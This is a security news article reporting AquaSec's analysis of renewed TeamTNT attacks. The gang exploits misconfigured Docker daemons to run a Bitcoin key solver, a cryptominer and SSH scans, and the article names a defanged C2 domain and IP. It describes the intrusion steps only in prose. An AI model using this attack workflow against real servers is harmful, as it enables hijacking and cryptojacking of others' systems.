TeamTNT is back and targets servers to run Bitcoin encryption solvers

AquaSec researchers observed the cybercrime gang TeamTNT hijacking servers to run Bitcoin solver since early September.

In the first week of September, AquaSec researchers identified at least three different attacks targeting their honeypots, the experts associated them with the cybercrime gang TeamTNT.

The TeamTNT botnet is a crypto-mining malware operation that has been active since April 2020 and targets Docker installs. The activity of the TeamTNT group has been detailed by security firm Trend Micro, but in August 2020 experts from Cado Security discovered that botnet is also able to target misconfigured Kubernetes installations.

In January 2021, the cybercrime gang launched a new campaign targeting Kubernetes environments with the Hildegard malware.

The discovery of the recent attacks is important because on November 6th, 2021, TeamTNT communicated via Twitter a farewell note. Experts pointed out that their infrastructure continued to automatically infect new victims with old worms that could scan and infect new systems.

The new attacks suggest the hacking group is back in action.

The new TeamTNT attacks are aimed at hijacking servers to run Bitcoin solver, the experts tracked the activity as “the Kangaroo attack,” because the threat actors were using Pollard’s Kangaroo WIF solver.

The attackers scan for vulnerable Docker Daemons, deploys an AlpineOS image, deliver a script (“k.sh”), and fetch the solver from GitHub.

“What we discovered is that TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server (domain: whatwill[.]be on IP 93[.]95[.]229[.]203).” reads the analysis published by AquaSec. “The shell script is cloning a GitHub project from what seems to be a TeamTNT account. The project was a bit of a conundrum at first, specifying that this is a fork of “Pollard’s kangaroo for SECPK1”.”

The Pollard’s Kangaroo interval ECDLP solver algorithm appears to be an attempt to break the SECP256K1 encryption which is used by Bitcoin to implement its public key cryptography. The TeamTNT group is using the computational power of the compromised targets to run the ECDLP solver.

The algorithm runs in a distributed fashion since the algorithm breaks the key into chunks and distributes them to various nodes that are the compromised servers, collecting the results which are then written locally to a text file.

“Breaking the cryptographic encryption is considered “Mission: Impossible”. If you actually succeed doing that, you potentially have the keys to almost everything that is connected online, which could have a devastating effect on the entire internet.” continue the experts.

According to the experts, the hacking gang is likely experimenting with new attack techniques.

AquaSec researchers also observed the gang using attacks attributed in the past to its activity, such as the Cronb Attack, but now using new feature improvements.

The new variant of the “Cronb Attack” relies on new C2 infrastructure and new data exchange.

Experts also observed the “What Will Be” Attack” against their honeypots, the threat actor exploited a misconfigured Docker API to run the vanilla container image alpine with a malicious command that was designed to download and run the shell file dc.sh.

The attack aims at deploying a cryptominer on the target systems and performing SSH scans on the network.

“TeamTNT was highly active between 2020 and 2021. They had used many tools and techniques in their campaigns and had launched them frequently. Some of these tools had been designed to escape from container environments, steal tokens and credentials, scan and attack local and external networks, hide activities with rootkits, and more.” concludes the report. “Now TeamTNT appears to be back with new tricks. We are still assessing if these three attacks are a sign that they have resumed their campaigns against cloud native environments or not.”

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, cryptomining)

[adrotate banner=”5″]

[adrotate banner=”13″]